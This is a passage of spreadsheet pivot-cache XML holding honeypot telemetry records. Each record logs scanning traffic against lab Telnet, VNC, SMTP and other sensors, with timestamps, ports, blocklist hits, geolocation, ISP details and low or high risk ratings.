    <d v="2025-04-15T21:07:38"/>
    <d v="2025-04-15T21:07:38"/>
    <d v="2025-04-15T21:07:38"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="11"/>
    <s v="Saitama"/>
    <s v="Sōka Shi"/>
    <s v="Sōka"/>
    <s v="1851604"/>
    <s v="340-0043"/>
    <s v="35.8254"/>
    <s v="139.805"/>
    <s v="4713"/>
    <s v="OCN NTT Communications Corporation"/>
    <s v="NTT Communications Corporation"/>
    <s v="corporate"/>
    <s v="Open Computer Network"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:99c2:1ad"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1602"/>
    <x v="1602"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T20:53:51"/>
    <d v="2025-04-14T09:17:43"/>
    <d v="2025-04-15T20:53:51"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SA"/>
    <s v="Saudi Arabia"/>
    <s v="01"/>
    <s v="Riyadh Region"/>
    <s v="NA"/>
    <s v="Riyadh"/>
    <s v="108410"/>
    <s v="NA"/>
    <s v="24.7136"/>
    <s v="46.6753"/>
    <s v="35819"/>
    <s v="Etihad Etisalat, a joint stock company"/>
    <s v="Etihad Etisalat"/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="2010-10-26"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e99:fe95"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1603"/>
    <x v="1603"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T20:50:42"/>
    <d v="2025-04-15T16:42:43"/>
    <d v="2025-04-15T20:50:42"/>
    <n v="19"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="IA"/>
    <s v="Iowa"/>
    <s v="Hancock"/>
    <s v="Kanawha"/>
    <s v="4863204"/>
    <s v="50447"/>
    <s v="42.9377"/>
    <s v="-93.7933"/>
    <s v="62643"/>
    <s v="Evertek, Inc"/>
    <s v="Evertek, Inc"/>
    <s v="business"/>
    <s v="Evertek, Inc"/>
    <s v="2011-11-28"/>
    <s v="EVERT-IPV4-2"/>
    <s v="2012-03-02"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:642a:5ef9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1604"/>
    <x v="1604"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T20:39:04"/>
    <d v="2025-04-15T20:39:04"/>
    <d v="2025-04-15T20:39:04"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Mayiladuthurai"/>
    <s v="Sīrkāzhi"/>
    <s v="1256075"/>
    <s v="NA"/>
    <s v="11.2373"/>
    <s v="79.7358"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:56fb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1605"/>
    <x v="1605"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T20:37:47"/>
    <d v="2025-04-15T18:35:03"/>
    <d v="2025-04-15T20:37:47"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="69"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="NA"/>
    <s v="Seoul (Namdaemunno 5(o)-ga)"/>
    <s v="1835848"/>
    <s v="NA"/>
    <s v="37.5562"/>
    <s v="126.975"/>
    <s v="9318"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="residential"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="2000-09-08"/>
    <s v="broadNnet"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d3f5:55db"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1606"/>
    <x v="1606"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T20:36:10"/>
    <d v="2025-01-24T14:10:10"/>
    <d v="2025-04-15T20:36:10"/>
    <n v="76"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SMTP_H47&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_SMTP_H19&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_REDIS_H19"/>
    <s v="25&amp;&amp;35904&amp;&amp;21&amp;&amp;6379&amp;&amp;23&amp;&amp;1433&amp;&amp;389&amp;&amp;110&amp;&amp;143&amp;&amp;5432&amp;&amp;1080&amp;&amp;1521&amp;&amp;80"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="79"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore"/>
    <s v="1880252"/>
    <s v="NA"/>
    <s v="1.35208"/>
    <s v="103.82"/>
    <s v="142002"/>
    <s v="Scloud Pte Ltd"/>
    <s v="Scloud Pte Ltd"/>
    <s v="hosting"/>
    <s v="Scloud Pte Ltd"/>
    <s v="1993-06-18"/>
    <s v="SCLOUDPTELTD-SG"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;command&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '185.74.222.213:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a59a:cbc9"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1607"/>
    <x v="1607"/>
    <s v="NA&amp;&amp;unassigned.162-216-241-197.spryt.net"/>
    <x v="0"/>
    <d v="2025-04-15T20:29:35"/>
    <d v="2024-12-21T03:20:01"/>
    <d v="2025-04-15T20:29:35"/>
    <n v="311"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H2&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_VNC_H24"/>
    <s v="53146&amp;&amp;5900&amp;&amp;61619&amp;&amp;61332&amp;&amp;65269&amp;&amp;52800&amp;&amp;51718&amp;&amp;61192&amp;&amp;54425&amp;&amp;58318&amp;&amp;49548&amp;&amp;56606&amp;&amp;60288&amp;&amp;62603&amp;&amp;56779"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="hosting"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2019-01-11"/>
    <s v="DYNU"/>
    <s v="2019-10-26"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a2d8:f1c5"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1608"/>
    <x v="1608"/>
    <s v="NA&amp;&amp;unassigned.162-216-241-248.spryt.net"/>
    <x v="0"/>
    <d v="2025-04-15T20:29:08"/>
    <d v="2024-12-21T03:32:37"/>
    <d v="2025-04-15T20:29:08"/>
    <n v="204"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H32"/>
    <s v="5900&amp;&amp;52963&amp;&amp;64111&amp;&amp;53704&amp;&amp;64966&amp;&amp;54770&amp;&amp;55795&amp;&amp;54481"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="hosting"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a2d8:f1f8"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1609"/>
    <x v="1609"/>
    <s v="NA&amp;&amp;unassigned.142-202-188-98.spryt.net"/>
    <x v="0"/>
    <d v="2025-04-15T20:27:16"/>
    <d v="2024-12-21T03:37:19"/>
    <d v="2025-04-15T20:27:16"/>
    <n v="266"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_VNC_H27"/>
    <s v="5900&amp;&amp;49512&amp;&amp;61706&amp;&amp;60607&amp;&amp;54671&amp;&amp;62876&amp;&amp;63485&amp;&amp;64624&amp;&amp;58126&amp;&amp;59395"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="hosting"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2019-12-18"/>
    <s v="DYNU"/>
    <s v="2019-12-18"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8eca:bc62"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1610"/>
    <x v="1610"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T20:25:09"/>
    <d v="2025-04-15T17:25:41"/>
    <d v="2025-04-15T20:25:09"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="40"/>
    <s v="Bình Thuận Province"/>
    <s v="Thành Phố Phan Thiết"/>
    <s v="Phan Thiết"/>
    <s v="1571058"/>
    <s v="NA"/>
    <s v="10.9289"/>
    <s v="108.102"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2008-11-04"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71b4:3592"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1611"/>
    <x v="1611"/>
    <s v="NA&amp;&amp;unassigned.162-216-243-228.spryt.net"/>
    <x v="0"/>
    <d v="2025-04-15T20:21:43"/>
    <d v="2024-12-21T03:27:15"/>
    <d v="2025-04-15T20:21:43"/>
    <n v="216"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H4&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_VNC_H32"/>
    <s v="5900&amp;&amp;49850&amp;&amp;52629&amp;&amp;50301"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="hosting"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2019-01-11"/>
    <s v="DYNU"/>
    <s v="2019-10-26"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a2d8:f3e4"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1612"/>
    <x v="1612"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T20:20:15"/>
    <d v="2025-04-15T20:20:15"/>
    <d v="2025-04-15T20:20:15"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="KKC"/>
    <s v="Kowloon City"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="1819609"/>
    <s v="NA"/>
    <s v="22.3144"/>
    <s v="114.22"/>
    <s v="17924"/>
    <s v="SMARTONE-MB-AS-AP"/>
    <s v="Smartone"/>
    <s v="consumer"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b4db:467b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1613"/>
    <x v="1613"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T20:11:46"/>
    <d v="2025-04-15T17:43:00"/>
    <d v="2025-04-15T20:11:46"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c8:a38c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1614"/>
    <x v="1614"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T19:47:33"/>
    <d v="2025-04-15T19:47:33"/>
    <d v="2025-04-15T19:47:33"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
